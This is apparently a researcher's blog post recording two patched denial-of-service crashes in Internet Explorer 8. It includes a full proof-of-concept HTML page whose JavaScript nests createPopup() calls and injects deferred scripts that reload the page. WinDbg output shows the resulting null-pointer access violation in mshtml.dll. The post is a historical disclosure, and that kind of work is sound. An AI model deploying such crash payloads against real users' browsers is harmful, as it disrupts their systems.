DoS: IE8 Crashes via createPopup and SCRIPT DEFER

While testing variations of another bug on IE8, I found two separate crash paths involving window.createPopup() and deferred scripts. Both were straightforward to trigger and required no user interaction.

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<title>IE8_DoS_createPopup</title>
</head>
<body>
<h1>IE8_DoS_createPopup</h1>
<font face="Arial" size="2">
<b>While testing variations of WinOOB #958601 on IE8 [8.0.6001.18405], two interesting DoS found me:</b><br /><br />
<hr />
<script language="JavaScript">
function crash_01()
{
	doc = window.createPopup().document;
	doc.body.innerHTML='.<SCRIPT DEFER>location.reload();<\/SCRIPT>';
}

function crash_02()
{
	cPop = window.createPopup();
	cPop2 = cPop.document.parentWindow.createPopup();

	cPop2.document.body.innerHTML='.<SCRIPT DEFER>location.reload();<\/SCRIPT>';
	cPop2.show(0,0,10,10);
}
</script>
	doc = window.createPopup().document;<br />
	doc.body.innerHTML='.&lt;SCRIPT DEFER&gt;location.reload();&lt;\/SCRIPT&gt;';<br />

<input type="button" onclick="crash_01()" value="Crash 01">
<br /><br />
<hr />

	cPop = window.createPopup();<br />
	cPop2 = cPop.document.parentWindow.createPopup();<br /><br />

	cPop2.document.body.innerHTML='.&lt;SCRIPT DEFER&gt;location.reload();&lt;\/SCRIPT&gt;';<br />
	cPop2.show(0,0,10,10);<br />
<font size="1" color="green">//This crash works only when using the transitional.dtd<br />
&lt;!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"&gt;</font><br />
<input type="button" onclick="crash_02()" value="Crash 02">

<br />
</font>
</body>
</html>

The WinDbg output from crash 02 showed an access violation in mshtml.dll at DllCanUnloadNow+0xfc1e, with a null pointer dereference at edi+0x10. The second crash was sensitive to the DOCTYPE — it only occurred with the XHTML Transitional DTD in place. Both crashes were tested on Windows XP SP3 with IE 8.0.6001.18405/18408.

(a78.aa0): Access violation - code c0000005 (first chance)
eax=01edf5b0 ebx=027d32d8 ecx=00000004 edx=00000000 esi=01edf5b0 edi=00000000
eip=637020aa esp=01edf528 ebp=01edf550
mshtml!DllCanUnloadNow+0xfc1e:
637020aa ff7710   push dword ptr [edi+10h]  ds:0023:00000010=????????

Found during my years at Microsoft (2006–2014). These bugs were patched long ago — shared here as a historical record for learning purposes.

Read other posts

< [DoS: IE7 Crashes When Writing Flash via innerHTML on ONKEYPRESS] :: [Sandbox LiveLabs: Script Execution, Freezers, and Style Parser Escapes] >